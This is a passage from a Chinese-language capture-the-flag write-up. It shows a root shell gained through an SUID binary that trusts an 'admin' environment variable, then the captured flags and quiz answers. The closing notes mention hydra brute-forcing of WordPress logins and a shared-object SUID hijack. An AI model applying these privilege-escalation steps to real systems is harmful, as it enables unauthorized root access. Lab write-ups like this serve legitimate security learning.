APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/home/bjoel
1
2
3
4
5
6
7
$ echo $admin
echo $admin
$ admin='1'
admin='1'
$ echo $admin
echo $admin
1
ltrace竟然是动态的。在设置了环境变量admin后,该二进制文件setuid(0),并且执行了/bin/bash。
1
2
3
4
5
root@blog:/root# ltrace /usr/sbin/checker
ltrace /usr/sbin/checker
getenv("admin") = "1"
setuid(0) = 0
system("/bin/bash"
1
2
3
4
5
6
7
8
$ /usr/sbin/checker
/usr/sbin/checker
root@blog:/home/bjoel# whoami
whoami
root
root@blog:/home/bjoel# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
1
2
3
4
5
6
7
8
root@blog:/home/bjoel# cd /root
cd /root
root@blog:/root# ls
ls
root.txt
root@blog:/root# cat root.txt
cat root.txt
9a0b2b618bef9bfa7ac28c1353d9f318
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@blog:/root# find / -name user.txt
find / -name user.txt
/home/bjoel/user.txt
/media/usb/user.txt
find: '/proc/2176/task/2176/net': Invalid argument
find: '/proc/2176/net': Invalid argument
find: '/proc/4526/task/4526/net': Invalid argument
find: '/proc/4526/net': Invalid argument
find: '/proc/4534/task/4534/net': Invalid argument
find: '/proc/4534/net': Invalid argument
root@blog:/root# cat /home/bjoel/user.txt
cat /home/bjoel/user.txt
You won't find what you're looking for here.
TRY HARDER
root@blog:/root# cat /media/usb/user.txt
cat /media/usb/user.txt
c8421899aae571f7af486492b71a8ab7
root.txt
9a0b2b618bef9bfa7ac28c1353d9f318
user.txt
c8421899aae571f7af486492b71a8ab7
Where was user.txt found?
/media/usb
What CMS was Billy using?
Wordpress
What version of the above CMS was being used?
5.0
Task 2: Credits
Congratulations!
总结:在hydra暴力破解WordPress登录密码时卡住了,因为没有正确地设置登录失败时返回的错误消息,导致hydra无法识别是否登录失败。在SUID提权这一步卡住了,一开始想着寻找SUID二进制文件中确实的共享引用,如果该共享对象在可写目录中,则创建一个c文件,setresuid(0,0,0); setresgid(0,0,0); system(“/bin/bash”);,然后将该c文件编译成共享对象,移动到由该SUID二进制文件引用的路径中。然后再运行该SUID二进制文件,就可以获得一个root shell。可惜这个Room是一道CTF题,也是上面常规利用套路的变式。注意ltrace输出内容是会根据二进制文件执行流程不同而动态变化,就像是if分支。我们首先查找拥有SUID的文件,通过GTFOBins排除合法功能的Unix二进制文件,发现/usr/sbin/checker并不是常见的二进制文件。/usr/sbin/checker是一个root拥有,且设置了SUID标志的二进制文件。我们用ltrace追踪它运行时做了什么,发现它获取环境变量admin,如果admin值为空,就输出Not an Admin,并结束程序。如果我们为admin赋值,那么该程序执行时会进入另一个分支,也就是setuid(0),然后执行/bin/bash。我们就成功获取了一个以root权限运行的bash shell。 如果不是看了write-up,我肯定想不到SUID提权这一步。但是也通过这道题学习到了ltrace、GTFOBins、SUID提权思路,也算有所收获。
